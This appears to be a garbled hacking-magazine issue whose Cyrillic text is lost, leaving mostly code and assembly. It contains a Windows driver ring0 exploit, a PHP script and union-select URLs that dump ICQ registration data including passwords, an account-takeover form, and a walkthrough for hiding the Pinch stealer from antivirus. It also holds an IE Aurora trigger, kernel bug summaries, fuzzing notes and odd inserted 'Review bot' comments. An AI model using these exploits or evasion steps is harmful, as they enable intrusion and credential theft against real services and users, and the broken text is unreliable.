.text:00010CE9 sub_10CD4 endp
EXPLOIT
DeviceIoControl, bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
bind( ListenSocket, (SOCKADDR*) &service,
sizeof(service); // !
, , dword_228B4
,
SOLUTION
04
G DATA
TARGETS:
:
1.Race Condition Native API
2. Ioctl
Ioctl
MiniIcptControlDevice0.
, ,
.
Ioctl 0x83170180:
.text:00010DBC cmp
.text:00010DC2 jz
[..]
.text:00010EC0 push eax ; <------ eax 4
, DoFreeContext, FLT_CONTEXT ,
:
: svchost.exe
,
.text:00010EC1 call FltReleaseContext ;
WDK,
.
,
,
.
FLT_CONTEXT .
,
. ,
.
, :
Step' Windbg,
DoFreeContext: FltReleaseContext
DoReleaseContext DoFreeContext.
.text:00011F04 ; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
.text:00011F04 mov edi, edi
.text:00011F06 push ebp
.text:00011F07 mov ebp, esp
.text:00011F09 push esi
.text:00011F0A push edi
.text:00011F0B mov edi, [ebp+Entry]
.text:00011F0E mov esi, [edi] ; <----- edi
.text:00011F10 mov eax, [esi+4]
.text:00011F13 test eax, eax ;<---- NULL
.text:00011F15 jz short loc_11F24
.text:00011F17 xor ecx, ecx
.text:00011F19 mov cx, [esi+0Ch]
.text:00011F1D push ecx
.text:00011F1E lea ecx, [edi+28h]
.text:00011F21 push ecx
.text:00011F22 call eax ; <-----
EXPLOIT
FLT_CONTEXT,
4 DeviceIoControl:
void craft_fake_flt_context(
char* buff,
LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;
Entry = (DWORD*)malloc(0x8);
Entry[0] = Entry; //Entry[0] == esi
Entry[1] = shellcode_addr; //[esi+4] r0 shellcode
memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}
...
craft_fake_flt_context(inbuffer, zpage);
buff[0] = inbuffer;
DeviceIoControl(
hDevice,
ioctl,
buff,
in,
buff,
out,
&len,
NULL);
SOLUTION
. ..z
DX http://kaimi.ru
, , ,
SQL- XSS.
,
,
272 273 . , :
.
,
,
,
. IT-, http://kaimi.
ru/quest. -:
SQL
HTML-. .
600 , 21.
,
. ,
.
, . ,
.
, , , .
help
. , !
0
: dx
: , . .
ans - , , ,
.
.
1
: Kaimi
: , , .
,
Google. ,
. ,
, .
- ,
. 2.
2
: Kaimi
:
. , 16 . , . ,
, ,
,
. ,
, .
ans,
base64
PHP
ROM-
Hexposure
Tineye.com! , ,
Babylon.
3
: Kaimi
: ,
, . PHP-, , , ,
. dx :). !
. -,
, base64,
, eval
print
, .
, ...
,
. , , ,
. ,
, .
, if. , -
, .
true, php-,
<?php ?> ,
,
!
: Kaimi
: PHP, 4.
ROM Dendy, Kaimi.
, , ,
.
, ,
. ... Kaimi - ROM
, , , !
: Hex-, ( "" <-> "").
Hexposure.
ROM Nesticle, ,
- (, ).
,
.
.
, :
80=0
81=1
8A=A
...
tbl. ROM,
Hexposure,
.
ROM, ,
.
,
, .
, - :).
Perl
, XOR BY 0X03. , XOR,
. , , , , ,
, , ,
,
. , PHP :
<?php
$string = ' ';
for($i = 0, $len = strlen($string); $i < $len; $i++)
print chr(ord($string[$i]) ^ 0x03);
?>
,
.
5
: Kaimi
: -, ,
Perl. ,
, . , ,
eval print - .
, lame,
,
. "369Y9RLj73Y
WTiX4W7D7460Wxj1Kkp4b6f7A4mbTWmw5sfnAnmHEZUA3VndW" ^
"CDP7Mrn6Yp631SxV6M-YSWl9ZJX-CTu0q0lqiMDrwI6g405q3M4zr1D8IMl" , - ,
XOR. , print, pl, : print "\
nCode: bazinga\n" if($ARGV[0] && $ARGV[0] eq 'pwn').
, bazinga.
6
: dx
: . ,
,
. ,
,
. , . , , . ,
,
1000, .
7
: dx
: C++. ,
, .
:
#include "windows.h"
void main()
{
DWORD ans = 0;
17C.
8
: Kaimi
: SWF- .
, . ? Media
Player Classic .
-
flash, , Sothink SWF Decompiler
28.
9
: dx
: , - .
.
.
10
: dx
: . rar- 500.rar,
499.rar, 498.rar, 0.rar,
. ,
( ,
, ). , .
:
@echo off
for /L %%i in (500,-1,0) do call :arch %%i
exit /b
:arch
set a=%1
rar x -r -pspielberg %a%.rar
del %a%.rar
exit /b
WinRAR,
500.rar; password.txt
.
11
: dx
: . ,
, ,
. - ,
(, SoundForge), .
12
: Kaimi
: .
, ,
. , , QR-,
, Tineye
Google,
, , , qc,
. - QR- (, zxing.org/w/decode.jspx), RAR!.
rar, WinRAR , ,
, , !
RAR-,
, ? ,
PNG- ,
, , . WinRAR
, ,
.
13
: dx
: .
, . , , exe
(, , ..). . , , Resource Hacker,
, .
14
: dx
: , ,
.
: ,
, ASCII-
, ,
,
.
, . ,
. ,
4. , .
15
: Kaimi
: , , ,
, .
exe-, - . ,
. ,
: NES US 89. , ,
NES 1989 .
, , ,
.
NES (ru.wikipedia.org/wiki/___NES/).
1989 , ,
, Ninja Gaiden. exe
, , ,
.
.
! ,
, , . , , ;
Kaimi ,
: kaimi.ru/quest_x2/.
, !
, , ,
, , ,
:).
! z
HTTP-
, HTTP-
, , ,
- . ?
?
,
. HTTP (HyperText Transfer Protocol ) - ,
-. WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) .
.
: ,
. ,
/ .
IP ( ). ,
, .
, ,
. -
Proxomitron.
, . HTTP-.
Proxomitron ,
.
.
Headers :
, ,
New. , out.
.
Mozilla Firefox . Tamper Data
. :
, .
.
Modify Headers.
Always on, .
. (Add , Modify , Filter ),
, ;
. , .
, / .
web-. ,
.
Wergon
cx75planet.ru
HP-include , . , ,
. , .
XSS ,
.
,
. XSS
Referer ( ), ,
( %xx).
, Referer.
,
.
XSS . , , , , .
SQL- . , , , .
PHP- ,
. .
, GET POST .
, , .
.
:
">. , . '"><script>alert(document.
cookie)</script>.
; , , , <?'?>
.
(
),
, . ,
?
document.cookie 1.
.
,
.
User-Agent
.
: , , , , .
,
:
Modify Headers
/ (; ; ,
[; - ]) []. X11 Windows,
, .
: N (None) , I
(International) 40 ,
U (USA) 128 .
.
, , . Mozilla,
. , ( )
(World
Wide Web Consortium, W3C), ,
.
, , ,
JavaScript (,
Invision Power Board,
2.3.x,
). User-Agent
.
Referer
, .
, - . Referrer ().
, -, ,
.
,
, ( ,
).
, URL , ,
http://evil, http://example.com/evil ..
X-Forwarded-For
, -
HTTP://WWW
links
tools.ietf.org/
html/rfc2616 RFC
HTTP/1.1
2ip.ru/
proxomitron.ru/
Proxomitron'
addons.mozilla.org/
ru/firefox/addon/966/
Tamper Data
addons.mozilla.org/
ru/firefox/addon/967/
Modify Headers
useragentstring.com/
User-Agent
The Proxomitron.
, ,
.
.
The Proxomitron.
IP .
IP, ,
, IP , X-Forwarded-For.
,
XFF, .
- (, , ,
IP ,
). : X-Forwarded-For: client_ip, proxy1_ip, ...,
proxyN_ip.
Accept-Language
,
. . ,
,
.
. , ,
.
Accept-Charset
. , ,
windows-1251.
X-Requested-With
, .
JavaScript . AJAX (Asynchronous
Javascript and XML) ,
XMLHttpRequest.
Authorization
,
, .
Authorization Basic
base64(user:pass). ,
,
(POST).
Cookie
, () .
: ,
. ,
.
, . , .
, , . ,
Accept-Language,
. Authorization , .. , -
. X-Requested-With Cookie ,
. PHP :
, PHPSESSID ( ,
, , ). ,
a-z, A-Z, 0-9 '-,',
- ,
:
Warning: session_start() [function.session-start]:
The session id contains illegal characters, valid
characters are a-z, A-Z, 0-9 and '-,' in /var/www/
data/www/login.php on line 2
, . , -
(), .
.
: , - (,
, ,
), Referer.
, ,
, ...
XSS FeedBurner,
RSS- .
Referer.
raz0r.name/vulnerabilities/
aktivnaya-xss-na-feedburner/ (wp.me/pft5J-4a) ( , - XFF :)).
The Proxomitron.
Tamper Data
DLE (DataLife
Engine), DLE Referer Module (
) . ICQ UIN MySQL-,
,
, .
php.ru
Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,IPS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/','a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')
PHP
, SQL-
. , , ,
. GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/showmeheaders.php', $headers);
echo $html;
PHP
( DVD):
Tamper Data
. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()
:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);
Curl
curl : curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
,
.
JavaScript, Flash ,
. NoScript
AdBlock. ,
, . ! z
M4g icq 884888, http://snipper.ru
DST
AOL
ICQ: ,,
ICQ
2010
ICQ IM DST AOL.
187 .
,
.
Changes
icq.com - 2010 .
.
, https://icq.com/password, ,
UIN ,
. , email' . ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,
.
:
1. ;
2. / ;
3. ,
, ;
4.
.
.
, - .
- icq.
com.
HTTP://WWW
links
ICQ ABV.bg
,
ICQ.
:
1. https://icq.com/password,
;
2.
click here;
3. ,
click here :
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1
,
mail@partner_icq.com.
,
.
, 2010 .
() .
.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3. ,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.
ICQ.com
(https://forum.antichat.ru/showthread.
php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group
SQL- blogs.icq.com
) - ICQ.com
(msgboard_u_ro@64.12.164.91 ,
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 S00pY Snipper.Ru.
,
( ).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+
mysql.
user:
http://forum.asechka.ru
.
http://www.icq.com/en.html
ICQ.com.
http://snipper.ru/view/23/sql-inekciyana-blogsicqcom/
SQL-
blogs.icq.com.
http://snipper.ru/view/27/vozvrashhenieugnannogo-nomeraicq/
ICQ.
http://www.rnspdf.londonstockexchange.com/rns/7389V_-2010-11-5.pdf
- DST
IPO.
http://russia.blog.nimbuzz.com/2010/11/09/icq-ne-rabotaet-vnimbuzz/
ICQ
Nimbuzz.
ICQ.com
SQL- icq.com/greetings
Mail.ru ICQ.com
select null,@@version,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/
msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...
, ,
blogs.icq.com , , SQL :).
, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date
, , , icq.com/register ! ,
, , ! ,
, :
1. ;
2. registration_temp;
3. .
:
<?php
...
while(1)
{
$a = send_data('GET','http://www.icq.com/
greetings/cards/-1111+union+select+1,count(regstr_
id),3,4,5,6,7+from+registration_temp+--/send/');
$count = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
$a = send_data('GET','http://www.icq.com/
. icq.com/wit
ICQ.
com
Yandex ICQ
greetings/cards/-1111+union+select+1,concat(regstr_
id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_
lname,0x3a,regstr_email,0x3a,regstr_
password,0x3a,regstr_bdate,0x3a,regstr_
question,0x3a,regstr_answer,0x3a,regstr_
nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,
6,7+from+registration_temp+limit+'.($count-1).',1+--/
send/');
$log = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
logger($log);
}
?>
, , ,
:). :
- ICQ.com.
https://www.icq.com/register/email_attach.php
( https://www.icq.com/
karma/login_page.php ).
, - ICQ.com
, ,
,
- .
,
:). .
, :
, ,
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php),
;
, , .
https://www.icq.com/register/email_attach.php.
- , html- :).
,
( ICQ.com):
1. html-:
<form action="http://icq.com/people/include/xhr.php"
method="POST">
<input name="f" value="resendMail"/><br/>
<input name="e" value="_@.ru"/><br/>
<input name="lang" value="en"/><br/>
<input name="server" value="prod"/><br/>
<input type="submit" value="ok"/><br/>
</form>
2. ;
3. email for login;
4.
https://icq.com/password :).
,
.
,
ICQ .
-,
ICQ,
.
, -
, ,
, . .
:).z
"Cr@wler" crawler@xakep.ru
,
,
malware-.
,
.
, , . -, -
Pinch (
, ).
,
-
( , ,
RAR- DVD).
VMWare Windows XP (
, ).
, OllyDbg, WinHex,
PE- LordPE. , ,
virustotal.com . , ,
, .
,
. . , .
!
.
. , XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. . , :
13147C30 PUSHAD
13147C31 MOV ECX,6C2F
13147C36 MOV EDX,DWORD PTR DS:[ECX+13141000]
13147C3C XOR EDX,76
13147C3F MOV DWORD PTR DS:[ECX+13141000],EDX
13147C45 LOOPD SHORT pinch_pa.13147C36
13147C47 POPAD
13147C48 JMP SHORT pinch_pa.13147810
( ,
copy to executable-all modifications,
Save file). , , LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . . ! . virustotal.com,
. , 31
43 ( 42 43)! .
.
,
. , ,
( - -
,
2009 ).
13147C4B XOR EAX,EAX;
13147C4D PUSH pinch_pa.13147C62;
13147C52 PUSH DWORD PTR FS:[EAX];
13147C55 MOV DWORD PTR FS:[EAX],ESP;
FS:[0]
13147C58 CALL pinch_pa.13147C58;
13147C5D JMP pinch_pa.13145555;
13147C62 POP EAX;
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810;
:
13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),
. , , ,
. ,
( 27 43
).
, ?
.
, , ,
,
. ,
,
. ,
, !
,
, (
).
13147C90 , ,
(4Ch ,
13147C30). ,
. ,
OllyDbg , OEP
,
.
. , ! ,
: , 13140002,
:
13140002
EB 24
, 13140028, :
13147C90 60            PUSHAD
13147C91 B9 4C000000   MOV ECX,4C
13147C96 8B91 307C1413 MOV EDX,DWORD PTR DS:[ECX+13147C30]
13147C9C 83F2 54       XOR EDX,54
13147C9F 8991 307C1413 MOV DWORD PTR DS:[ECX+13147C30],EDX
13147CA5 ^E2 EF        LOOPD SHORT kadabra_.13147C96
13147CA7 61            POPAD
jmp 13147c30
,
, .
. , , PE-, ImageBase,
. . WinHex , : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000 4D   DEC EBP
13140001 5A   POP EDX
13140002 0000 ADD BYTE PTR DS:[EAX],AL
13140004 0100 ADD DWORD PTR DS:[EAX],EAX
...
13140028 0000
,
. , ,
MZ-,
, . ,
. 13140028.
13140028 -E9 637C0000 JMP 13147c90
, LordPE
EntryPoint. , , :
25 43 .
, ,
.conf .data ,
. .
,
OllyDbg , ,
! , , image base.
Image base , ,
.
: ,
15- .
, ,
15000 , . , - ,
. , ,
-
, API-,
. ? .
,
. ,
,
. ,
. ,
. ,
, API- GetLocalTime,
:
:)
16-
:
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME;
, , GetLocalTime,
, , , 13147D7D
13147D94. Sleep(), Kernel32,
, , , . , :
13147CFA PUSH kadabra_.13147D7D;
13147CFF CALL kernel32.GetLocalTime;
13147D04 PUSH 3E8; 1000 , 1
13147D09 CALL kernel32.Sleep;
13147D0E PUSH kadabra_.13147D94;
13147D13 CALL kernel32.GetLocalTime;
16-
, , , :
[][][ ][ ] []
[] [][]
13147D7D: DA 07 0A 00 02 00 0C 00 0D 00 0C 00 31 00 B1 03
13147D94: DA 07 0A 00 02 00 0C 00 0D 00 0D 00 04 00 B1 03
: ,
,
Dr. Web
. 1 ,
, ,
[13147d7d+] [13147D94+],
( ).
, . ?
.
( , , ),
, :). , :
13147CF9 ; (
)
13147D18 MOV AL,BYTE PTR DS:[13147D89]; AL
13147D1D MOV AH,BYTE PTR DS:[13147DA0]; AH
13147D23 SUB AH,AL;
13147D25 XOR EBX,EBX; EBX
13147D27 MOV BL,AH; EBX
13147D29 ADD EBX,13147C29;
13147D2F JMP EBX;
, , ,
EBX, 13147C30. , , , .
: Dr. Web ! :).
. 22 43
- .
, , -
. , ,
, , :
. ,
,
virustotal .
, , , , ,
. ,
, -, TLS. ?
, .
, TLS- ,
,
25%
, . , callback-
.
, TLS (Thread Local Storage)-callback-
( , TLS ,
),
, , . Callback
, OEP.
,
, ,
PE-.
TLS-
( callback- ).
, , .
.
(13147d80 13147d90), .text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d
14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( ).
TLS-.
13147da0, 6 ,
Binary Edit. 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :
13147DB0 PUSHAD;
13147DB1 MOV ECX,6D2F;
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];
DH
13147DBC XOR DH,CL;
13147DBE MOV BYTE PTR DS:[ECX+13141000],DH;
13147DC4 LOOPD SHORT 13147DB6;
13147DC6 POPAD;
13147DC7 RETN;
, , , ,
-
OllyDbg.
TLS-
PE-. LordPE TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback !).
virustotal.com.
18 43 ! , ,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe
.
. , .
! z
>> coding
http://lotus.xakep.ru
X-testing ontest
IBM Lotus Symphony 3. ,
Lotusphere, 2011 .
cr@wler
10
Lotus Symphony
Lotusphere-2011.
zenit80 .
(Digital Security, dookie@inbox.ru)
(CISS Research Team)
(CISS Research Team, twitter.com/Ntarakanov)
[Figure: Avalanche. Diagram labels: avalanche driver, tracegrind, covgrind, STP, input + executable, trace.log, dangertrace.log, conditional jumps inversion, danger conditions checking, new input values, heuristic value, errors]
, ,
Microsoft,
. ,
. .
, .
...
Fuzz me baby one more time!
( , ),
. , ,
- ,
, :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
, :
+----+-------|FFFF|61626364...
+----+-------
In Memory Fuzzing.
IDA
In Memory Fuzzing.
...
| "abcd..."
+----+-------+----+--------+
|0004|25XX25XX|
+----+--------+
| "%n%n"
|
+----+--------+
+----++
|0000||
+----++
| "" |
+----++
, , , ,
... ,
-
(0xFFFF -1)
memcpy, , .
char buffer[32000];
short int length=getLen(filename, offset); // length=-1 ~ 0xFFFF
if(length<32000) { // -1<32000
    char* p = getPointer(filename,offset+4);
    memcpy(buffer,p,length); // length==65535
}
else
    ExceptionBoF(length);
( ),
. :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
:
+----+--------+
|0000|61626364|
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|00FF|61626364|
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|FF00|61626364|
+----+--------+
| "abcd"
|
+----+--------+
(0xFF00 - -256 65280 ),
- .
,
. , (
), .
, , , - . ,
,
,
. , , . , ,
- ( / ) ,
. ,
, .
, .
More profit...
, , .
, ,
, . , 2006 (Shawn Embleton),
(Sherri Sparks) (Ryan Cunningham)
. ,
( ,
..) , .
( ), ,
, , API (strcpy)
, , .
,
.
( ). , ,
, :).
fputs("FUNC1: done!\n",stdout);
}
avalanche, klee
hotfuzz, inmemoryfuzzing
sulley, peach
simple fuzzer:
blackhat.com/
presentations/bh-usa-06/BH-US-06-Embleton.pdf.
In-Memory Fuzzing
, .
?
. , ,
, ,
.
. ,
; , ,
, (, ,
..).
, accept,
recv, .
CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/
archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debuger
(debugger.immunityinc.com/register.html). ,
,
) c pvefindaddr.py (redmine.corelan.be:8800/projects/
pvefindaddr). , ,
:
1. ;
2. pvefindaddr, PyCommand (
);
3. pydasm 2.5;
4. , , installers, ;
5. pydasm Python25\Lib\site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. - . , ,
,
. ,
- .
, .
.
void func1(char* input)
{
char buffer[255];
unsigned int len=strlen(input);
if(len<255) strcpy (buffer , input);
, , ,
,
. - .
input.txt: function_1:function_1:function_3. (vuln.exe)
, .
.
. pvefindadr.
, functions -o -m vuln.exe. functions.txt.
. Trace.py.
, Trace.py, ,
, .
vuln.exe . func.
.
functions.txt, function_. , (RET),
(, ,
ESP+4, , ESP+8).
new_functions_addrs.txt ( ) flow_log.txt ( ).
CTRL+C ,
:). flow_log.txt ,
( ESP+4 ), /
new_functions_addrs.txt breakpoints.txt,
.
:
0x00401000 0x0040106d ESP+4
0x00401070 0x004010c7 ESP+4
0x004010d0 0x00401125 ESP+4
InMmoryFuzzer.py
vuln.exe. ,
, ,
,
( )
(). crashbin
. ,
(. ). ,
(InMemoryFuzz) ,
, ,
... , , pvefindaddr ,
IDA. ,
,
Peach
(00401070) .
, strcpy ,
. ,
. ( ,
, ,
). ,
(vuln.exe
/GS), security cookie
,
, .
[Figure labels: Recorded data aggregation, Data matching, Proxy]
. , , ,
winappdbg.
.
, winappdbg
.
: avalanche klee
avalanche (http://code.google.com/p/avalanche/):
.
[Figure: Hot fuzz architecture. Diagram labels: Custom Process monitor, Peach in the middle, Custom publisher, GUI Communicator, Main window, Fuzzing Graphical User Interface, Datatype-based fuzzing, Netstat based port scanning, Dialogs, UDP support, Custom Random Fuzzing strategy, Packet reconstruction, Viewing crash details, Data receive, Packets dissection, Filling in missing data, Additional data analysis, Process handling, XML manipulators, Storing application settings, Transforming C-structures into Python-structures, Data analysis]
Sulley peach.
. , FTP 329
, . ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , ,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
,
peach ( DVD).
[Figure labels: Customized WindowsDebugEngine Monitor, Recording, TCP support]
:
3*10^6 5*10^3 ,
1-3 ;
1*10^6 15*10^3 , 6-10 ;
:
1*10^5 150 ,
0-3 ;
1*10^4 150 ,
0-1 .
,
:
http://sites.google.com/
site/felipeandresmanzano. ,
.
,
. .
[Figure: hotfuzz. Diagram labels: Configuration file generation, Data type correction, Transformation into Peach structures, Peach structures creation, Strings tokenization, Finding relations, Wireshark libraries]
Avalanche
( ). , .
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/
avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ configure --prefix=`pwd`/inst
$ make
$ make install
:
$ ./inst/bin/avalanche --filename=samples/simple/seed
--debug samples/simple/sample2 samples/simple/seed
Avalanche,
avalanche ? -
winappdbg
avalanche ,
.
, ,
,
. :
(tainted) ,
( , , ..),
.
( , ,
). ,
,
, ,
, . Avalanche
Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind
. STP . - , STP
( ), .
,
.
. ,
STP
.
,
, .
(
, Valgrind).
Covgrind,
. Covgrind , Tracegrind,
.
: Avalanche ,
,
. (tainted
analysis[2-5]), , , ,
.
STP
Avalanche ,
. KLEE
(klee.llvm.org).
. z
, CISS Research Team http://twitter.com/NTarakanov
TOP5
2010
- ,
!
-,
.
5 .
2007 CVE-2007-4573 (bit.ly/CVE-20074573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, 32- . (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
    cmpl $(IA32_NR_syscalls-1),%eax    <---- EAX
    ja ia32_badsys
    IA32_ARG_FIXUP 1
    call *ia32_sys_call_table(,%rax,8)    <---- RAX
, eax .
, IA32_ARG_
FIXUP. 64- 32-.
sysenter_do_call, ,
eax,
rax! , 32 ,
call !
.macro IA32_ARG_FIXUP noebp=0
    movl %edi,%r8d
    .if \noebp
    .else
    movl %ebp,%r9d
    .endif
    xchg %ecx,%esi
    movl %ebx,%edi
    movl %edx,%edx /* zero extension */
.endm
LOAD_ARGS:
X+
.macro LOAD_ARGS32 offset
+
movl \offset(%rsp),%r11d
+
movl \offset+8(%rsp),%r10d
+
movl \offset+16(%rsp),%r9d
+
movl \offset+24(%rsp),%r8d
+
movl \offset+40(%rsp),%ecx
+
movl \offset+48(%rsp),%edx
+
movl \offset+56(%rsp),%esi
+
movl \offset+64(%rsp),%edi
+
movl \offset+72(%rsp),%eax <----
rax
.endm
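Review bot: In LOAD_ARGS32 the load `movl \offset+72(%rsp),%eax` carries no comment, although a 32-bit move into %eax is what clears the upper half of %rax before `call *ia32_sys_call_table(,%rax,8)` indexes the table with the full register. IA32_ARG_FIXUP already marks `movl %edx,%edx` with /* zero extension */; the same comment on the %eax line would keep the instruction from being dropped or widened in a later cleanup.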
24 2008
, :).
-
movl \offset+72(%rsp),%eax
.endm
FreeBSD 7.2
cmpl
$(IA32_NR_syscalls-1),%eax
+
cmpq
$(IA32_NR_syscalls-1),%rax <--- rax eax
4 .
FreeBSD: nfs_mount()
Patroklos
Argyroudis, argp.
nfs_mount,
mount() nmount(),
, . sys/nfsclient/nfs_vfsops.c 8.0:
* 1094
if (!has_fh_opt) {
* 1095
error = copyin((caddr_t)args.fh,
(caddr_t)nfh,
<-----
*
*
*
*
1096
1097
1098
1099
: vfs.usermount
( ). , :
+
if (args.fhsize < 0 || args.fhsize > NFSX_
V3FHMAX) {
+
vfs_mount_error(mp, "Bad file handle");
+
error = EINVAL;
+
goto out;
+
}
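Review bot: The message passed to vfs_mount_error() in the new check, "Bad file handle", does not say what was wrong with the handle. The condition rejects args.fhsize below 0 and above NFSX_V3FHMAX, so the message should name the size as the problem and report the offending value, which makes a rejected mount diagnosable from the error alone.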
FreeBSD 8.0 ,
, canary word. FreeBSD
stack-smashing protection.
. ret , canary word
FreeBSD
. , (ring 3), (ring 0). -
7- , 8- DoS' :(.
3 .
Windows
! ,
mail.ru
Windows 17- !.
32- Windows, NT 4.0 !
Windows 16-
NTVDM (NT Virtual DOS Mode).
Tavis Ormandy
Google. , /.
:
1. VDM SeTcbPrivilege.
2. (Ring 3 )
.
3. -
Tavis'
trap frame. Tavis Ormandy !
. . NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20- .
: (cs << 4) + (eip & 0xffff).
Virtual-8086.
, cs !
. iret
.
Intel 6 ,
IF-. : Pre-commit
Post-commit. , ring 3.
VDM,
NtVdmControl, pre-commit trap-frame.
2 . Internet
Explorer: Aurora
IE (CVE-2010-0249),
Aurora.
Microsoft',
( MS).
CVE-2010-0249 mshtml.dll. ,
use-after-free. , JavaScript,
:
document.CreateEventObject() ;
document.getElementById(),
, JavaScript'a -
-
, !
-
srcElement CEventObj::GenericGetElement
mshtml.dll, , , CElement::
GetDocPtr.
:
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++)
{
obj[i].data = data;
}
event_obj.srcElement;
}
[Figure: call graph with legend "Data Access" / "Control Flow". Function labels: CPL_FindCPLInfo, CPL_LoadAndFindApplet, DSA_GetItemPtr, CPL_LoadCPLModule, CopyIcon, _LoadCPLModule, _InitializeCPLModule, LoadLibraryW, _InitializeControl, DSA_InsertItem, LoadImage; data labels: hIcon, hModule]
, DEP,
ASLR,
, .
Google: , 12
Gmail.
! :) ,
, , , Google .
17 . Microsoft
advisory.
( ;)),
Microsoft VirusBlokAda
, .
-, - :).
stack/heap overflow
.. ,
:).
Control Panel,
Explorer.exe.
shell32.dll,
,
( ) LoadLibraryW.
,
(DEP/ASLR/SEHOP) !
1 .
lnk-
2011-?
<body>
<span id="sp1">
<img src="aurora.gif onload="ev1(event)">
<-----
</span>
</body>
, , , , top 5! Stuxnet,
USB-.
MetaSploit'e , WebDAV .
:
17 .
VirusBlokAda ,
Windows 7,
USB-
(Windows Explorer).
,
2010 , .
Stuxnet
SCADA-, Aurora
, -
:). , (,
, ) 0day .
, ,
Windows Vista, 2008, 7,
Stuxnet! . , , . z
icq 884888, http://snipper.ru
X-TOOLS
: Steam`O Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: INSIDER
, steam-.
:
(http, socks 4/5);
;
;
